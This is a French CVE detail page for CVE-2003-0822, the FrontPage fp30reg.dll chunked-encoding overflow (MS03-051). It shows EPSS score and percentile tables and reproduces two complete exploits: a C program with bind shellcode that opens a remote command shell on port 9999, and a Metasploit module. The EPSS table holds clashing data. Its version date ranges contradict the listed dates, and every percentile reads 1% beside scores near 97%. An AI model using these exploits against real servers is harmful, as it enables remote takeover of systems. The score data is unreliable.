CVE-2003-0822 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	91.86%	–	–
2023-03-12	–	–	–	97.14%	–
2023-05-28	–	–	–	97.17%	–
2023-12-03	–	–	–	97.04%	–
2024-04-28	–	–	–	97.1%	–
2024-06-02	–	–	–	97.1%	–
2024-09-15	–	–	–	97%	–
2024-12-22	–	–	–	96.9%	–
2025-01-19	–	–	–	96.9%	–
2025-03-18	–	–	–	–	89.07%
2025-03-30	–	–	–	–	89.14%
2025-03-30	–	–	–	–	89.14,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-05-28	1%
2023-12-03	1%
2024-04-28	1%
2024-06-02	1%
2024-09-15	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	1%
2025-03-30	1%
2025-03-30	1%

/******************************************************************************* Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore Exploit by Adik netmaniac hotmail kg Binds persistent command shell on port 9999 Tested on Windows 2000 Professional SP3 English version (fp30reg.dll ver 4.0.2.5526) -[ 13/Nov/2003 ]- ********************************************************************************/ #include <stdio.h> #include <string.h> #include <winsock.h> #pragma comment(lib,"ws2_32") #define VER "0.1" /******** bind shellcode spawns persistent shell on port 9999 *****************************/ unsigned char kyrgyz_bind_code[] = { 0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33, 0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA, 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88 }; void cmdshell (int sock); long gimmeip(char *hostname); int main(int argc,char *argv[]) { WSADATA wsaData; struct sockaddr_in targetTCP; struct hostent *host; int sockTCP,s; unsigned short port = 80; long ip; unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"; unsigned char packet[3000],data[1500]; unsigned char ecx[] = "\xe0\xf3\xd4\x67"; unsigned char edi[] = "\xff\xd0\x90\x90"; unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll unsigned char shortjmp[] = "\xeb\x10"; printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n" " by Adik < netmaniac [at] hotmail.KG >\n\n", VER); if(argc < 2) { printf(" Usage: %s [Target] <port>\n" " eg: fp30reg.exe 192.168.63.130\n\n",argv[0]); return 1; } if(argc==3) port = atoi(argv[2]); WSAStartup(0x0202, &wsaData); printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port); ip=gimmeip(argv[1]); memset(&targetTCP, 0, sizeof(targetTCP)); memset(packet,0,sizeof(packet)); targetTCP.sin_family = AF_INET; targetTCP.sin_addr.s_addr = ip; targetTCP.sin_port = htons(port); sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]); memset(data, 0x90, sizeof(data)-1); data[sizeof(data)-1] = '\x0'; memcpy(&data[16],edi,sizeof(edi)-1); memcpy(&data[20],ecx,sizeof(ecx)-1); memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1); memcpy(&data[250+14],call,sizeof(call)-1); memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code)); sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("[x] Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } printf("[*] Socket initialized...\n"); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0) { printf("[*] Connection to host failed! Exiting...\n"); WSACleanup(); exit(1); } printf("[*] Checking for presence of fp30reg.dll..."); if (send(sockTCP, packet, strlen(packet),0) == -1) { printf("[x] Failed to inject packet! Exiting...\n"); WSACleanup(); return 1; } memset(packet,0,sizeof(packet)); if (recv(sockTCP, packet, sizeof(packet),0) == -1) { printf("[x] Failed to receive packet! Exiting...\n"); WSACleanup(); return 1; } if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0') printf(" Found!\n"); else { printf(" Not Found!! Exiting...\n"); WSACleanup(); return 1; } printf("[*] Packet injected!\n"); closesocket(sockTCP); printf("[*] Sleeping "); for(s=0;s<13000;s+=1000) { printf(". "); Sleep(1000); } printf("\n[*] Connecting to host: %s on port 9999",argv[1]); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n[x] Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } targetTCP.sin_family = AF_INET; targetTCP.sin_addr.s_addr = ip; targetTCP.sin_port = htons(9999); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0) { printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n"); WSACleanup(); exit(1); } printf("\n[*] Dropping to shell...\n\n"); cmdshell(sockTCP); return 0; } /*********************************************************************************/ void cmdshell (int sock) { struct timeval tv; int length; unsigned long o[2]; char buffer[1000]; tv.tv_sec = 1; tv.tv_usec = 0; while (1) { o[0] = 1; o[1] = sock; length = select (0, (fd_set *)&o, NULL, NULL, &tv); if(length == 1) { length = recv (sock, buffer, sizeof (buffer), 0); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup(); return; } length = write (1, buffer, length); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup(); return; } } else { length = read (0, buffer, sizeof (buffer)); if (length <= 0) { printf("[x] Connection closed.\n"); WSACleanup(); return; } length = send(sock, buffer, length, 0); if (length <= 0) { printf("[x] Connection closed.\n"); WSACleanup(); return; } } } } /*********************************************************************************/ long gimmeip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname); WSACleanup(); exit(1); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } /*********************************************************************************/ // milw0rm.com [2003-11-13]

## # $Id: ms03_051_fp30reg_chunked.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow', 'Description' => %q{ This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular modules works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ [ 'CVE', '2003-0822'], [ 'OSVDB', '2952'], [ 'BID', '9007'], [ 'MSB', 'MS03-051'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ ['Windows 2000 SP0-SP3', { 'Ret' => 0x6c38a4d0 }], # from mfc42.dll ['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1 }], # from fp30reg.dll 07/22/2002 ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999 ], 'DisclosureDate' => 'Nov 11 2003', 'DefaultTarget' => 0)) register_options( [ OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]), ], self.class) end def exploit print_status("Creating overflow request for fp30reg.dll...") pat = rand_text_alphanumeric(0xdead) pat[128, 4] = [target.ret].pack('V') pat[264, 4] = [target.ret].pack('V') # sub eax,0xfffffeff; jmp eax pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0" pat[280, 512] = make_nops(512) pat[792, payload.encoded.length] = payload.encoded 0.upto(15) do |i| if (i % 3 == 0) print_status("Refreshing the remote dllhost.exe process...") res = send_request_raw({ 'uri' => datastore['URL'] }, -1) if (res and res.body =~ /specified module could not be found/) print_status("The server states that #{datastore['URL']} does not exist.\n") return end end print_status("Trying to exploit fp30reg.dll (request #{i} of 15)") res = send_request_raw({ 'uri' => datastore['URL'], 'method' => 'POST', 'headers' => { 'Transfer-Encoding' => 'Chunked' }, 'data' => "DEAD\r\n#{pat}\r\n0\r\n" }, 5) if (res and res.body =~ /specified module could not be found/) print_status("The server states that #{datastore['URL']} does not exist.\n") return end handler select(nil,nil,nil,1) end end def check print_status("Requesting the vulnerable ISAPI path...") r = send_request_raw({ 'uri' => datastore['URL'] }, -1) if (r and r.code == 501) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end end